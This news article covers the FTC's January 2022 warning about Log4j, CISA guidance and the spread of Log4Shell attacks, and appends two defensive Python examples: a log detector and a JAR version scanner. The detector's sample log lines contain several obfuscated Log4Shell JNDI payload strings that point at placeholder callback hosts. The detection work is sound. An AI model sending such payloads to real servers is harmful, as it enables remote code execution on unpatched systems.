
FTC to Go After Companies that Ignore Log4j

January 5, 2022

Companies that fail to protect consumer data from Log4j attacks risk Equifax-style legal action and fines, the FTC warned.

The Federal Trade Commission (FTC) will bring its legal authority to bear against companies and vendors that fail to protect consumer data from the Log4j vulnerabilities, it warned on Tuesday.

“The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,” the warning said.


Organizations that mishandle consumer data, leaving vulnerabilities unpatched and thereby opening the door to exploits and the resulting potential “loss or breach of personal information, financial losses, and other irreversible harms,” risk consequences under statutes that have already produced heavy fines, the FTC said.

It cited, among others, the Federal Trade Commission Act and the Gramm-Leach-Bliley Act. The FTC Act, the commission’s primary statute, lets it seek monetary redress and other relief for conduct injurious to consumers. Gramm-Leach-Bliley requires financial institutions to safeguard sensitive data.

“It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,” the FTC urged.

The FTC means it: its warning included a reference to the complaint against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its notorious 2017 data breach. (Consumers’ reaction at the time: make it hurt more.)

According to the complaint in Equifax, its failure to patch a known vulnerability “irreversibly exposed the personal information of 147 million consumers.” Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4j or whatever similar known vulnerabilities arise, it said.

The FTC advised companies to use guidance from the Cybersecurity and Infrastructure Security Agency (CISA) to check whether they are using Apache’s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as Log4Shell.

Organizations that find they are using Log4j should do the following, CISA advised:

  • Update your Log4j software package to the most current version.
  • Consult CISA guidance to mitigate this vulnerability.
  • Ensure remedial steps are taken so that your company’s practices do not violate the law. Failure to identify and patch instances of this software may violate the FTC Act.
  • Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.

On Dec. 17, CISA issued an emergency directive requiring federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days, until Dec. 28, to report Log4Shell-affected products, including vendor and application names and versions, along with what actions had been taken (e.g. updated, mitigated, removed from the agency network) to block exploitation attempts.

CISA maintains a dedicated page for the Log4Shell flaws with patching information and has released a Log4j scanner to hunt down potentially vulnerable web services.

The Log4j Fire Rages Unabated

The initial flaw, CVE-2021-44228, was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against half of all corporate networks, using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:

  • The Log4Shell remote-code execution (RCE) bug, which spawned even nastier mutations and which led to …
  • The potential for denial of service (DoS) in Apache’s initial patch. Plus, there was …
  • A third bug, a DoS flaw related to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups, not the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228: lookups that, in the Log4Shell vulnerability, let attackers execute whatever code is returned.
  • At this point, the Conti ransomware gang has had a full attack chain in place for weeks.

In a Monday update, Microsoft said that the end of December brought no relief: the company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month’s end. “Microsoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,” Microsoft security researchers warned.

“Exploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,” the researchers said.

Hunting Down Log4j

One of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word “ubiquitous” has applied since the get-go: “Since it is a cross-platform, widely used software library, there is tremendous variety in where and how it is deployed: it can be an application package installed by itself, bundled with another software package as just another file on disk or embedded in another application with no visible artifact,” J.J. Guy, co-founder and CEO of Sevco Security, told Threatpost on Wednesday.

“Even worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.”

We’re just in the middle of the triage phase now, Guy said, where simple tools such as systems-management or software-management tools that check for the file on disk can provide initial triage.

One question: what’s the inventory of devices that still needs to be triaged?

“For organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the devices that have been triaged but also how many are pending triage,” Guy remarked. “Reporting the ‘pending triage’ statistic requires a comprehensive asset inventory, including which devices have been successfully triaged.”

He called this “one of the bigger hidden challenges” in every organization’s response, given that so few have a complete asset inventory, “despite the fact it has been a top requirement in every security compliance program for decades.”
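The probing Microsoft describes usually arrives as a `${jndi:...}` lookup string dropped into any field the target will log (the User-Agent, a query parameter, a header), and attackers wrap it in nested `${lower:...}`, `${upper:...}` and `${key:-default}` lookups so that a naive grep for `jndi:` misses it. The detector below is an added example written for this page, not Microsoft's or Threatpost's code. It runs over a handful of constructed Apache access-log lines (the addresses are documentation ranges, not real indicators), URL-decodes each line, resolves the nested lookups inside-out the way Log4j does, and reports the scheme and callback host of any JNDI lookup that survives.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote

# Innermost ${...} lookup: no nested "${" inside. Log4j resolves these first.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A JNDI lookup left standing after normalization; scheme and callback host are the IOCs.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def _resolve_inner(m) -> str:
    body = m.group(1)
    head = body.lower()
    if head.startswith("lower:"):
        return body[len("lower:"):].lower()
    if head.startswith("upper:"):
        return body[len("upper:"):].upper()
    if ":-" in body:
        # ${key:-default}: the attacker picks a key that never resolves ("::", "env:NOPE"),
        # so the default is what the logger actually emits. Assume the default.
        return body.split(":-", 1)[1]
    return m.group(0)  # ${jndi:...} and lookups we do not model stay as written


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode, then collapse nested lookups inside-out until nothing changes."""
    text = unquote(text)
    for _ in range(max_rounds):  # bounded so a hostile line cannot make this spin
        new = INNER_LOOKUP.sub(_resolve_inner, text)
        if new == text:
            break
        text = new
    return text


def detect(line: str) -> Optional[dict]:
    """Return scheme, callback host and the decoded line if a JNDI lookup is present."""
    decoded = normalize(line)
    m = JNDI_LOOKUP.search(decoded)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "callback": m.group(2), "decoded": decoded}


def scan(lines: List[str]) -> List[Tuple[int, dict]]:
    """Index and finding for every line that carries a JNDI lookup."""
    return [(i, hit) for i, line in enumerate(lines) if (hit := detect(line))]


# Constructed sample access-log lines (Apache combined format); not real traffic.
SAMPLE_LOGS = [
    '198.51.100.20 - - [10/Dec/2021:03:12:01 +0000] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:03:12:04 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.5 - - [10/Dec/2021:03:12:09 +0000] "GET / HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:RMI}://203.0.113.9/x}"',
    '203.0.113.5 - - [10/Dec/2021:03:12:15 +0000] "GET / HTTP/1.1" 200 612 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://203.0.113.9/z}"',
    '203.0.113.5 - - [10/Dec/2021:03:12:21 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.21 - - [10/Dec/2021:03:12:30 +0000] "GET /?s=${date:yyyy} HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Dec/2021:03:12:44 +0000] "GET / HTTP/1.1" 200 612 "-" "${${env:NOPE:-${lower:J}}ndi:dns://203.0.113.9/y}"',
]

if __name__ == "__main__":
    for idx, hit in scan(SAMPLE_LOGS):
        print(f"line {idx}: {hit['scheme']}://{hit['callback']}")
```

Resolving defaults and case lookups before matching is what separates this from a string search: lines 2, 3 and 6 contain no literal `jndi:` at all until the inner lookups are folded. The callback host is the value worth forwarding to egress blocking and threat-intel matching; the decoded line is worth keeping beside the raw one so an analyst can see both.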
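CISA's first step (find out whether you run Log4j at all) and Guy's three deployment shapes (a package on its own, a file bundled inside another package, or a copy embedded with no visible artifact) spell out what a disk-level triage tool has to do beyond matching a filename. The scanner below is an added example for this page, not CISA's scanner or Sevco's tooling: it walks a directory, opens every JAR/WAR/EAR including archives nested inside archives, reads the log4j-core version from `pom.properties` (falling back to the filename), checks for `JndiLookup.class`, and classifies each hit. The fixed-version floors are an assumption as of early January 2022, and `build_sample_tree` writes a constructed fixture to a temp directory so the code runs offline.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import Dict, List, Optional

ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FILENAME_VERSION = re.compile(r"log4j-core-(\d[\w.-]*)\.jar$")


def parse_version(v: str) -> tuple:
    nums = tuple(int(p) for p in re.findall(r"\d+", v)[:3])
    return (nums + (0, 0, 0))[:3]


def is_fixed(version: str) -> bool:
    # ASSUMPTION: fixed floors per release line as of early January 2022
    # (2.17.1 for Java 8+, 2.12.4 for Java 7, 2.3.2 for Java 6). Check the Apache
    # Log4j security page for the current values before relying on these.
    v = parse_version(version)
    if v[:2] == (2, 3):
        return v >= (2, 3, 2)
    if v[:2] == (2, 12):
        return v >= (2, 12, 4)
    return v >= (2, 17, 1)


def classify(version: Optional[str], has_jndi: bool) -> str:
    if version is None:
        return "unknown-version"   # shaded/embedded copy with no version artifact: manual review
    if is_fixed(version):
        return "patched"
    return "vulnerable" if has_jndi else "mitigated"   # class deleted per Apache's interim guidance


def inspect_archive(zf: zipfile.ZipFile, path: str, findings: List[dict]) -> None:
    names = set(zf.namelist())
    has_jndi = JNDI_CLASS in names
    version = None
    if POM_PROPS in names:
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    if version is None:
        m = FILENAME_VERSION.search(path)
        version = m.group(1) if m else None
    if has_jndi or version is not None:
        findings.append({"path": path, "version": version, "jndi_lookup": has_jndi,
                         "status": classify(version, has_jndi)})
    for name in names:  # fat JARs, WARs and EARs carry archives inside archives
        if name.lower().endswith(ARCHIVE_EXT):
            try:
                nested = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            inspect_archive(nested, f"{path}!/{name}", findings)


def scan_tree(root: str) -> List[dict]:
    """Every log4j-core artifact under root, nested ones included, with a triage status."""
    findings: List[dict] = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, f)
                try:
                    with zipfile.ZipFile(full) as zf:
                        inspect_archive(zf, os.path.relpath(full, root), findings)
                except zipfile.BadZipFile:
                    continue
    return sorted(findings, key=lambda r: r["path"])


def _jar(entries: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_tree() -> str:
    """Constructed fixture (not a real deployment) covering each way Log4j shows up on disk."""
    root = tempfile.mkdtemp(prefix="log4j-triage-")

    def put(rel: str, data: bytes) -> None:
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)

    stub = b"\xca\xfe\xba\xbe"  # class-file magic stands in for real bytecode
    put("app1/lib/log4j-core-2.14.1.jar", _jar({JNDI_CLASS: stub, POM_PROPS: b"version=2.14.1\n"}))
    put("app2/service.war", _jar({"WEB-INF/lib/log4j-core-2.17.1.jar":
                                  _jar({JNDI_CLASS: stub, POM_PROPS: b"version=2.17.1\n"})}))
    put("app3/lib/log4j-core-2.14.1.jar", _jar({POM_PROPS: b"version=2.14.1\n"}))   # class removed
    put("app4/vendor-all.jar", _jar({JNDI_CLASS: stub, "com/vendor/App.class": stub}))  # shaded copy
    put("app5/other.jar", _jar({"com/other/Main.class": stub}))                        # no Log4j
    return root
```

Run `scan_tree(build_sample_tree())` and the four statuses line up with Guy's three shapes: `app1` is the plain package, `app2` is the copy bundled inside a WAR, and `app4` is the embedded copy that a filename search never sees, so it is reported as unknown-version for a human to chase rather than silently skipped. Feeding the per-host results back into an asset inventory is what turns this into the "triaged versus pending triage" count the next paragraphs call for.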

Some sections of this article are sourced from:
threatpost.com